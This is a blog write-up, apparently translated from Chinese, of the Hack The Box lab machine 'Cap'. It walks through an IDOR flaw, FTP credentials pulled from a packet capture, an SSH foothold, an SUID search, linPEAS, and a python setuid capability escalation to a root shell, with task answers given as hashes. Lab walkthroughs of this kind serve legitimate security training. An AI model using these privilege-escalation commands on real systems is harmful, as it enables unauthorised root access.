banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

htb target - Cap

#htb#靶场48
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
**Cap** is a simple Linux machine running an HTTP server that manages functions including network capture. It has an insecure direct object reference (IDOR) vulnerability, allowing access to another user's capture, which contains plaintext credentials for gaining a foothold. The user then escalates privileges to root. **Tasks:** 1. **Open TCP Ports:** There are 3 open TCP ports. 2. **Redirection Path:** After running "Security Snapshot," the browser redirects to a path formatted as /[something]/[id]. 3. **View Other Users' Scans:** By changing the ID in the data parameter, other users' scan results can be viewed. 4. **Sensitive Data IDs in PCAP:** The IDs containing sensitive data are linked to FTP login credentials. 5. **Application Layer Protocol:** Sensitive data appears in the FTP protocol. 6. **FTP Password Usage:** Nathan's FTP password can also be used for SSH. 7. **Flag Submission from Nathan's Directory:** SSH into Nathan's account to find the flag. 8. **Root Flag Submission:** To escalate privileges, check for SUID files and use a privilege escalation script. Upload the script to the target machine and execute it to gain root access.

Cap#

ip:10.10.10.245

Cap is a Linux machine running an HTTP server with a simple difficulty level, which performs management functions including network capture. Improper controls lead to insecure direct object references (IDOR), allowing access to captures from other users. The capture contains plaintext credentials that can be used to gain a foothold. Subsequently, Linux features are exploited to escalate to root privileges.

task1
How many TCP ports are open?

3

0a3b63c90efdde661a0cd2ca8c9fb567_MD5

task2
After running "Security Snapshot", the browser will redirect to a path formatted as /[something]/[id], where [id] represents the scanned ID number. What is [something]?

528ab93b652c321e083476b15704cffc_MD5

task3 Can you view the scan results of other users?

By changing the number id after data, you can view the scan results of other users.

task4 What is the ID of the sensitive data contained in the PCAP file?

538c44c3ee6e4ab0fa9c8f1e91eb49da_MD5

25d1f22548598d75dda64dcdb92fbaea_MD5

62e53d034c91de170301a5beefb6a543_MD5

The id refers to the number of data, and the 0 pcap file contains FTP login account information.

task5 In which application layer protocol does sensitive data appear in the pcap file?

ftp

task6 We have obtained Nathan's FTP password. What other services can this password be used for?

ssh

task 7 Submit the flag located in Nathan's home directory.

ssh nathan@10.10.10.245

You can see the flag after logging in.

task8 Submit the flag located in the root directory.

Check the setuid bit.

find / -perm -u=s -type f 2>/dev/null

c7cacbd5aa296cfdad067ce817920fdb_MD5

Privilege escalation script

https://github.com/carlospolop/PEAss-ng/tree/master/linPEAS

Upload to the target machine 10.10.10.245

9d8d11c9f2f53b0b55e9a9b284497887_MD5

python

Reference: https://gtfobins.github.io/gtfobins/python/

cp $(which python) .
sudo setcap cap_setuid+ep python

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'

/usr/bin/python3.8

import os
os.setuid(0)
os.system("/bin/bash")

78abb3c1c434aed28bfd4a4e6224ec89_MD5

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.